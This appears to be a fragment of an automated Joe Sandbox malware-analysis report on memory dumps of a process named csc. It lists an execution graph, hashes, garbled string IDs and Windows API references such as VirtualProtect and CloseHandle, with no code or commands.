                                                                                                                        execution_graph 33691 4f2ec40 33693 4f2ec53 33691->33693 33695 4f2ecf8 33693->33695 33696 4f2ed40 VirtualProtect 33695->33696 33698 4f2ecdb 33696->33698 33676 94c8308 33677 94c831d 33676->33677 33679 94c86da 33677->33679 33681 94c8669 33679->33681 33680 94c87d4 33680->33677 33681->33679 33681->33680 33683 9481c88 33681->33683 33686 9481c93 33683->33686 33684 9481e94 33684->33681 33685 9481d20 KiUserExceptionDispatcher 33685->33686 33686->33684 33686->33685 33687 4f2eea8 33688 4f2eee8 CloseHandle 33687->33688 33690 4f2ef19 33688->33690
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4$T''
                                                                                                                        • API String ID: 0-3223105421
                                                                                                                        • Opcode ID: 09406dee279972af35935da269b7ad2e0056671dfbf5b49483bf5b3d855b32c0
                                                                                                                        • Instruction ID: e4ce1ddbb629d6242c0062b6986eedb33426eb96ead2db91d9ecddd4a89f6379
                                                                                                                        • Opcode Fuzzy Hash: 09406dee279972af35935da269b7ad2e0056671dfbf5b49483bf5b3d855b32c0
                                                                                                                        • Instruction Fuzzy Hash: 9AB20734A01218DFDB14CFA5C994BADB7B6BF48310F158199EA05EB3A6DB70AC85CF50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4$T''
                                                                                                                        • API String ID: 0-3223105421
                                                                                                                        • Opcode ID: 4caf02b135f1a240821ea95d3c0b7f7fc4452911f483cbf0661e2ab7f72596a6
                                                                                                                        • Instruction ID: eb92e6fb49674773e4aac77a6123bf89bdf1693b6299571b377cac879132e314
                                                                                                                        • Opcode Fuzzy Hash: 4caf02b135f1a240821ea95d3c0b7f7fc4452911f483cbf0661e2ab7f72596a6
                                                                                                                        • Instruction Fuzzy Hash: D222FA34A01218CFDB24DF65C994BADB7B6BF48310F148199EA09EB396DB70AD81CF50
                                                                                                                        APIs
                                                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 09481D24
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3788796913.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_9480000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DispatcherExceptionUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 6842923-0
                                                                                                                        • Opcode ID: b53fda1f9289b592b6dd3128315d6c190e9e772ad329ef1d687ed343e3643882
                                                                                                                        • Instruction ID: 2b4e174dbdd551696167fa1e1375e9e495a7f200d284526056370086a9caf600
                                                                                                                        • Opcode Fuzzy Hash: b53fda1f9289b592b6dd3128315d6c190e9e772ad329ef1d687ed343e3643882
                                                                                                                        • Instruction Fuzzy Hash: 3B5171387015809FC348EBB9D4A9B7A73E3AB9D351B06507ED94ACB350DE349E81CB51

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HD'$TC'$h3'$h3'$l0'$p1'$t/'$t/'$t2'$|.'$8'$9'
                                                                                                                        • API String ID: 0-2600670598
                                                                                                                        • Opcode ID: 4eab0f5e9bab0c1718a172c1f64fbf73fedff58599b2fb0b9eac7d4866cbf5d7
                                                                                                                        • Instruction ID: af310080a012e9ba563717de779609faff957a4f02a2ed533fa9fbec27ce1d83
                                                                                                                        • Opcode Fuzzy Hash: 4eab0f5e9bab0c1718a172c1f64fbf73fedff58599b2fb0b9eac7d4866cbf5d7
                                                                                                                        • Instruction Fuzzy Hash: B602C2717042028FDB149F6AD46973EB7E3FFC5360F1544AAE682DB3A2DA34C8418756

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <V'$~{%$~{%
                                                                                                                        • API String ID: 0-2908653633
                                                                                                                        • Opcode ID: d1fec78c10ef65408d855dadc94842f8e2a9faf44dbf639abb9c3c60f15d77a9
                                                                                                                        • Instruction ID: 2e34164cd57890d989561ea661407da173c7af5f2e982733342109b04aaa2efc
                                                                                                                        • Opcode Fuzzy Hash: d1fec78c10ef65408d855dadc94842f8e2a9faf44dbf639abb9c3c60f15d77a9
                                                                                                                        • Instruction Fuzzy Hash: 52127A30A01608DFCB24DFA6C4A4A6EB7F2FF88710F148569E546EB355DB35AC46CB90

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <5'$<5'$l`'
                                                                                                                        • API String ID: 0-2648597921
                                                                                                                        • Opcode ID: 727fe84a0b82aecddae331b97e2d4e559cb566fb73c68a68b96dd9531687fe2c
                                                                                                                        • Instruction ID: 6837c04bc2c996ef5424445aae8578e2d2fc6b547ee45b98231dfab2befea186
                                                                                                                        • Opcode Fuzzy Hash: 727fe84a0b82aecddae331b97e2d4e559cb566fb73c68a68b96dd9531687fe2c
                                                                                                                        • Instruction Fuzzy Hash: 44E13134A01209DFCB04EFA5D494A9DB7B2FFC9310F118569E906AB3A4DB34ED46CB91

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @r'$l`'$l`'
                                                                                                                        • API String ID: 0-4063128814
                                                                                                                        • Opcode ID: 40ce038e4d6a07451297042d0b89795fedbca99843b9f741290d4eb31a9156ec
                                                                                                                        • Instruction ID: e76035c0392cf8016d12f3c59a99a84faceadeeed83ab6763bcab69ebd4f077d
                                                                                                                        • Opcode Fuzzy Hash: 40ce038e4d6a07451297042d0b89795fedbca99843b9f741290d4eb31a9156ec
                                                                                                                        • Instruction Fuzzy Hash: F6C1C575A00618CFCB04DFA5D9A4E9EB7B6FF89310F104169E506EB3A4DB71AC42CB51

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: x^'$x^'$x^'
                                                                                                                        • API String ID: 0-3548421634
                                                                                                                        • Opcode ID: 0dc6d17a4c00be60f74eb43b697c832ea6ce4150414b077ff25fbe5dc4304a8f
                                                                                                                        • Instruction ID: 8b58b081e04a4d8fdc4f1bbab95823a1ca95b7918fe154768c76633854aaf633
                                                                                                                        • Opcode Fuzzy Hash: 0dc6d17a4c00be60f74eb43b697c832ea6ce4150414b077ff25fbe5dc4304a8f
                                                                                                                        • Instruction Fuzzy Hash: 8D314F36600204DFDF099F64D858E69BBB2FF89310F1544A9FA06AB361DA71DC51CB91

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: d$y%
                                                                                                                        • API String ID: 0-1338975589
                                                                                                                        • Opcode ID: 972c2d094fd61266985376a9bc8d3a1a2c48c2215a6ead6adb3e0a0f7faa3e27
                                                                                                                        • Instruction ID: 8f5f87c710f43461909ca17d2df97e57500e7ca858923ffdc01bdedf588bcc72
                                                                                                                        • Opcode Fuzzy Hash: 972c2d094fd61266985376a9bc8d3a1a2c48c2215a6ead6adb3e0a0f7faa3e27
                                                                                                                        • Instruction Fuzzy Hash: D9D18C34601605CFCB14CF29C494A6AB7F6FF88321B258969E55ACB762DB30FC42CB90

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (l'$h'
                                                                                                                        • API String ID: 0-560915138
                                                                                                                        • Opcode ID: 63ef233dfaf738a5f9e8d7e112eaa7eb5bfcb93c55a6a708fd6182205b4aa418
                                                                                                                        • Instruction ID: 5b819f7a58ece307b30f1120c8f05fb9a37e5270aa2050ba8b6a9052ec09c959
                                                                                                                        • Opcode Fuzzy Hash: 63ef233dfaf738a5f9e8d7e112eaa7eb5bfcb93c55a6a708fd6182205b4aa418
                                                                                                                        • Instruction Fuzzy Hash: 48E1E0B5A002288FCB64DF69C994B9DBBF2BB88310F1441E9E549E7351DB309E85CF61

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: zh_$zh_
                                                                                                                        • API String ID: 0-1088455910
                                                                                                                        • Opcode ID: 892bdb23e9e3d66f37d1b6e1c8f8451e9eaf141d683f68258e4d6fdb71954664
                                                                                                                        • Instruction ID: 361bef4b135f342f0d0c79c2b403421fa2cd843deb4c55344896b11d62d0952c
                                                                                                                        • Opcode Fuzzy Hash: 892bdb23e9e3d66f37d1b6e1c8f8451e9eaf141d683f68258e4d6fdb71954664
                                                                                                                        • Instruction Fuzzy Hash: C3910470B006148FEB18DF29C894AAA7BF6BF89750B1540A9E505DF3B1DB70EC41CBA1

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'$l`'
                                                                                                                        • API String ID: 0-266309857
                                                                                                                        • Opcode ID: cd684898729a48c892baf78492692b36eb0ab25fae9d4cb42a33215511f9e4f1
                                                                                                                        • Instruction ID: 0996706b97c3a3847cc14104fb0617b1adc00cc8a0b92155b074f86462487b5f
                                                                                                                        • Opcode Fuzzy Hash: cd684898729a48c892baf78492692b36eb0ab25fae9d4cb42a33215511f9e4f1
                                                                                                                        • Instruction Fuzzy Hash: 23814C34B006058FCB14EF69C465B9DB7B2BF88710F10856AE602DB3B4CB75AD4ACB90

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HK'$|L'
                                                                                                                        • API String ID: 0-361813333
                                                                                                                        • Opcode ID: e3df04bec4f27ff4b670368a33f26d4f14f27847d6185a7bbdac94c3d324f42d
                                                                                                                        • Instruction ID: 531630c2bec1c184fec95ac7e67b85b61a98474b04ba7c190cca7e67c90bc25c
                                                                                                                        • Opcode Fuzzy Hash: e3df04bec4f27ff4b670368a33f26d4f14f27847d6185a7bbdac94c3d324f42d
                                                                                                                        • Instruction Fuzzy Hash: 9441B5327041596FCF019EEA9C509FFBFEAEF89210B04406BFA45E3251CA35CD259BA0

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %tY$l`'
                                                                                                                        • API String ID: 0-2902025712
                                                                                                                        • Opcode ID: d1e93b8fe9fa215e5606191d9a620bf687043c2a9a83f15a217739c8f0ae732e
                                                                                                                        • Instruction ID: 5d570f3d356bd784b06c2334e5ade0e9b379caebf072bddd03c0a691851581ca
                                                                                                                        • Opcode Fuzzy Hash: d1e93b8fe9fa215e5606191d9a620bf687043c2a9a83f15a217739c8f0ae732e
                                                                                                                        • Instruction Fuzzy Hash: EE415E30B106158FCB04AB69C864B6EB7B6BFC9710F10951AE607EB3A4DF749C06CB91

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <5'$<5'
                                                                                                                        • API String ID: 0-3241267148
                                                                                                                        • Opcode ID: 6891ee7908be39a9959e0b9cf740eb36595adf7ffeb9ba84b33ea8344f65bfb8
                                                                                                                        • Instruction ID: 167ae90860977239a5cfbe71db7c0c39a714fce39b74a0f33cb77dfb21d4dd69
                                                                                                                        • Opcode Fuzzy Hash: 6891ee7908be39a9959e0b9cf740eb36595adf7ffeb9ba84b33ea8344f65bfb8
                                                                                                                        • Instruction Fuzzy Hash: 2521A1313052408FD7248B6AB954B6AB7E5EFC1331B1585BAE38ECB251DB31EC41C751

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: S%
                                                                                                                        • API String ID: 0-9707960
                                                                                                                        • Opcode ID: 45ad358044613be916461311f60a40e85c404dd329912188967aab09698cb02d
                                                                                                                        • Instruction ID: 840c68c6a437c1e0cc47c6b0c505240eeb68f7917f303e98e1a7ad6d6d3b50e4
                                                                                                                        • Opcode Fuzzy Hash: 45ad358044613be916461311f60a40e85c404dd329912188967aab09698cb02d
                                                                                                                        • Instruction Fuzzy Hash: C8228B71A102049FDB04DFA9D4A5A6DB7F2FF88360F158069E905EB3A6CB75ED40CB90

                                                                                                                        Control-flow Graph
                                                                                                                        [Figure: control-flow graph; legend: Executed / Not Executed]
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 2acd57f554b771ae7ded16593bacf0488707527556d5967fea7602bb806d61ed
                                                                                                                        • Instruction ID: 995b99fb5e066c51664461d7f293c4d9ca64fdef04688c7abef19788adf7a525
                                                                                                                        • Opcode Fuzzy Hash: 2acd57f554b771ae7ded16593bacf0488707527556d5967fea7602bb806d61ed
                                                                                                                        • Instruction Fuzzy Hash: 4A120D34A002198FCB14EF65C8A4B9DB7B2BF89310F5185A8E54AAB395DF70ED85CF40

                                                                                                                        Control-flow Graph
                                                                                                                        [Figure: control-flow graph; legend: Executed / Not Executed]
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: a24695b0b7ec5d77567dbfc5397ee266fd7986ca635f1446b0d90774ff93b00d
                                                                                                                        • Instruction ID: a01b71b78364d04c33eb095160339220f25f6bc8650dd694508240ed4b8ac578
                                                                                                                        • Opcode Fuzzy Hash: a24695b0b7ec5d77567dbfc5397ee266fd7986ca635f1446b0d90774ff93b00d
                                                                                                                        • Instruction Fuzzy Hash: E0D16C32A00214DFDB09CF95C854A99BBB2FF89310F0644A8E649AB232D771ED55DF91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 290d421ef43707854844528126acd31dabb3b94866b35fdc1a5181e00d614c01
                                                                                                                        • Instruction ID: 0657110e630ff34c5efe83a0e1fbc9013d22faa7c8e499c7813a1127f39b3cd6
                                                                                                                        • Opcode Fuzzy Hash: 290d421ef43707854844528126acd31dabb3b94866b35fdc1a5181e00d614c01
                                                                                                                        • Instruction Fuzzy Hash: 49F1CA34A00219DFDB04DFA5D9A8E9DB7B2FF88310F119159E906AB3A5DB70EC46CB41
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 04F2ED6C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3785930868.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_4f20000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        • Opcode ID: 8ab6a5c414cba4992eb262ceab0e716aa5f93e88663b1bdfdd430506ea0803a6
                                                                                                                        • Instruction ID: c1dabf4c03bdd9664873d67b6e99b04f96917e09d11262dbfb0570899fb17443
                                                                                                                        • Opcode Fuzzy Hash: 8ab6a5c414cba4992eb262ceab0e716aa5f93e88663b1bdfdd430506ea0803a6
                                                                                                                        • Instruction Fuzzy Hash: 3F11E571D003499FDB24DFAAC844B9EFBF5EF48320F54842AD419A7210C775A9458FA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: cd64a3590c5889534b6f1c4e610d8de8f78dbb01f03e78506f3a901b2bca07f6
                                                                                                                        • Instruction ID: 85338b9f43e5ccf20d1118a48393d2ee5ea0770eb818b466398b0c59ac0d83c3
                                                                                                                        • Opcode Fuzzy Hash: cd64a3590c5889534b6f1c4e610d8de8f78dbb01f03e78506f3a901b2bca07f6
                                                                                                                        • Instruction Fuzzy Hash: 46C1D775A00618CFCB08DFA5D9A4E9EB7B6FF89310F104169E506EB3A4DB31AC42CB51
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: d5560c58f1a75982c743a5b5d6477991a6bb3a44ad16fcace73016d099a299fe
                                                                                                                        • Instruction ID: 19b05905133bff7714f0acba958c63b610c261cdd1d3acb9c6d159522694e704
                                                                                                                        • Opcode Fuzzy Hash: d5560c58f1a75982c743a5b5d6477991a6bb3a44ad16fcace73016d099a299fe
                                                                                                                        • Instruction Fuzzy Hash: 87A169357006158FCB09EF69C464A6E7BB2BFC9710B108659E606DB3A4DF70ED46CB81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: d64653d3e938322b06e19c3a2d294066c65551027b7ee88bebdc9eccfe19d7ba
                                                                                                                        • Instruction ID: f2bca2e508215393ac90961b1a0f34cb08bd05788751a5c64fa59e10d701b382
                                                                                                                        • Opcode Fuzzy Hash: d64653d3e938322b06e19c3a2d294066c65551027b7ee88bebdc9eccfe19d7ba
                                                                                                                        • Instruction Fuzzy Hash: C4A10C34A002158FDB14DF25C894BA9B7B2BF89310F5085A9E54AEB3A5DF70ED85CF40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 0f2ea0e106b8f7c36e7000c12054a4cd4ad6f14913f241381297f3a5b759d6db
                                                                                                                        • Instruction ID: 704c90f114bdec45be979bc1496cc389b2eedcb80a7c9f653743fbf884998c8c
                                                                                                                        • Opcode Fuzzy Hash: 0f2ea0e106b8f7c36e7000c12054a4cd4ad6f14913f241381297f3a5b759d6db
                                                                                                                        • Instruction Fuzzy Hash: FDA1ED34A10219DFCB04EFA5D8A8A9DF7B2FF88310F159159E906AB365DB70EC46CB41
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 8a325f981fb9e68baa7a2105f4ddbf280724fe268aafe3a69551c32a0d2d5faf
                                                                                                                        • Instruction ID: 3a246cbd655584efa996493dc94cdcc172e9c29cdf80cf999241af2945a645d3
                                                                                                                        • Opcode Fuzzy Hash: 8a325f981fb9e68baa7a2105f4ddbf280724fe268aafe3a69551c32a0d2d5faf
                                                                                                                        • Instruction Fuzzy Hash: 1B713C30B106159FCB04EF65D8A9B6DB7B6BF88710F1481A9E606DB3A5CB30AC05CB91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: c3ff318388270ad03b078d0c3b2c6201dd10bdb6fc101a4af1ea81ad4ac7c96e
                                                                                                                        • Instruction ID: 0033df10924a3523fe0869d43045480997ab4b77739414e26c93b68dcf0e64ab
                                                                                                                        • Opcode Fuzzy Hash: c3ff318388270ad03b078d0c3b2c6201dd10bdb6fc101a4af1ea81ad4ac7c96e
                                                                                                                        • Instruction Fuzzy Hash: 4B616F34B106058FCB14EF69C469B9DB7B2BF88710F10856AE642D77B0DB74AD4ACB90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 78177d748a4631d6661030d12162b9bcaa97843a9397a78a9b49c6b5f7e2231d
                                                                                                                        • Instruction ID: f60d42e2910f195d0cc8c29ada7e63482f728797ba7c889ab0d8d98dd1c00bac
                                                                                                                        • Opcode Fuzzy Hash: 78177d748a4631d6661030d12162b9bcaa97843a9397a78a9b49c6b5f7e2231d
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3785930868.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_4f20000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3788415083.0000000009470000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.3787355907.00000000093B0000.00000004.08000000.00040000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_93b0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 431c4eed31e547ee82e487b8e0ed15d5d46b0068ba9cbd1d11fb055b629872b8
                                                                                                                        • Instruction ID: abe271163bd5717a78e59dd7237830e35fa0b90e1e0b3f967cecf3938731b2a5
                                                                                                                        • Opcode Fuzzy Hash: 431c4eed31e547ee82e487b8e0ed15d5d46b0068ba9cbd1d11fb055b629872b8
                                                                                                                        • Instruction Fuzzy Hash: 14315C353002248FD754EF39D49CF6ABBE5EF49711F1500AAE516CB3B2CA61EC058B61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
